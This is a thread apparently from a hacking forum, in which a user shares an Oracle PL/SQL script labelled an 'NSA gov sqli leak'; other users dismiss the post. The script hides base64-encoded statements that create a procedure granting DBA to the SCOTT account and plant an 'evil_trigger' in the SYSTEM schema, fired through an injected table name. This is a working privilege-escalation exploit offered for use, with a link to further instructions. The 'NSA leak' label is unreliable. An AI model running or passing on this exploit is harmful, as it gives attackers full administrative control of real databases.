[un3xpectedbandit]

NSA gov sqli leak
https://cdn.freebiesupply.com/logos/larg...-white.png

let me give a brief explanation of what this is 
the following strings in the script are in Base64 format. When decoded they translate to sql commands to create and execute DATABASE procedures.

 There is steps were you can create a stored procedure D that grants the DBA 
steps:  you need to connect to an Oracle Database  using   appropriate client to connect the database and execute the script.
here is the encoded base64 strings leak:
provided to you by h3x0rb 
DECLARE

      JR VARCHAR2(32767);
      P VARCHAR2(32767);
      LWWQE VARCHAR2(32767);
      OWDG VARCHAR2(32767);
      DDHSZAS VARCHAR2(32767);
      BEGIN
      JR := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('CiAgICAgIENSRUFURSBPUiBSRVBMQUNFIFBST0NFRFVSRSBECiAgICAgIEFVVEhJRCBDVVJSRU5UX1VTRVIgQVMKICAgICAgUFJBR01BIEFVVE9OT01PVVNfVFJBTlNBQ1RJT047CiAgICAgIEJFR0lOIEVYRUNVVEUgSU1NRURJQVRFICdHUkFOVCBEQkEgVE8gU0NPVFQnOwogICAgICBFTkQ7CiAgICAgIA==')));
      EXECUTE IMMEDIATE JR;
      EXECUTE IMMEDIATE 'GRANT EXECUTE ON D TO PUBLIC';
      P := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('CiAgICAgIENSRUFURSBPUiBSRVBMQUNFIEZVTkNUSU9OIERHRlJMIFJFVFVSTiBudW1iZXIgQVVUSElEIENVUlJFTlRfVVNFUiBpcwogICAgICBQUkFHTUEgQVVUT05PTU9VU19UUkFOU0FDVElPTjsKICAgICAgU1RNVCBWQVJDSEFSMig0MDApOj0gJ2NyZWF0ZSBvciByZXBsYWNlIHRyaWdnZXIgc3lzdGVtLmV2aWxfdHJpZ2dlciBiZWZvcmUgaW5zZXJ0IG9uIHN5c3RlbS5ERUYkX1RFTVAkTE9CIERFQ0xBUkUgbXNnIFZBUkNIQVIyKDEwKTsKICAgICAgQkVHSU4gU0NPVFQuRDsKICAgICAgZW5kIGV2aWxfdHJpZ2dlcjsnOwogICAgICBCRUdJTgogICAgICBFWEVDVVRFIElNTUVESUFURSBTVE1UOwogICAgICBDT01NSVQ7CiAgICAgIFJFVFVSTiAxOwogICAgICBFTkQ7CiAgICAgIA==')));
      EXECUTE IMMEDIATE P;
      EXECUTE IMMEDIATE 'GRANT EXECUTE ON DGFRL TO PUBLIC';
      LWWQE := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('Y3JlYXRlIHRhYmxlICJPJyBhbmQgMT1TQ09UVC5ER0ZSTC0tIihpZCBudW1iZXIp')));
      EXECUTE IMMEDIATE LWWQE;
      OWDG := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('ZHJvcCB0YWJsZSAiTycgYW5kIDE9U0NPVFQuREdGUkwtLSI=')));
      EXECUTE IMMEDIATE OWDG;
      DDHSZAS := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('aW5zZXJ0IGludG8gc3lzdGVtLkRFRiRfVEVNUCRMT0IgKFRFTVAkQkxPQikgVkFMVUVTICgnQUEnKQ==')));
      EXECUTE IMMEDIATE DDHSZAS;
      END;
      /
      DROP FUNCTION D;
      DROP FUNCTION DGFRL;

here is the file and also the decoded strings and also more instructions:

https://pixeldrain.com/u/KPsSbdFv

TELE: govbandit
TEAM: hexorb
--------------------
infosec
bugbounty
blackhat

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Incapable of reading leak section rules | Consistently spamming other leaks and databases section | Low IQ | Unable to comprehend staff's requests to post in Exploits and POC section

[m1nut3m4n]

how is this a leak when the last line of link say "Connect sqlplus username/password@//hostname:port/service_name @name_script.sql" - this is just base64?

[un3xpectedbandit]

how is this a leak when the last line of link say "Connect sqlplus username/password@//hostname:port/service_name @name_script.sql" - this is just base64?

that is to connect to the database with you own oracle database once you decrypt the base64 you should be able to use that to get some more info in the database

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Incapable of reading leak section rules | Consistently spamming other leaks and databases section | Low IQ | Unable to comprehend staff's requests to post in Exploits and POC section

[grimoire]

Another useless post thanks mr bandit

[brainrot]

why the hell do you spend your time posting this shit?